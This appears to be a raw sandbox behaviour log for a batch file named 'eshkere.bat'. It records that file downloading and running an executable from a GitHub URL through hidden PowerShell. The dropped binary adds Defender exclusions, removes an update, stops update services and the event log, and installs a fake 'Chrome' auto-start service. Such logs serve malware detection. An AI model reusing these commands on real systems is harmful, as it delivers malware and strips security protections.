            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\ProgramData\Chrome.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: eshkere.batReversingLabs: Detection: 15%
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe"
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Chrome"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Chrome"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\Chrome.exe C:\ProgramData\Chrome.exe
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Chrome"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Chrome"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\Chrome.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
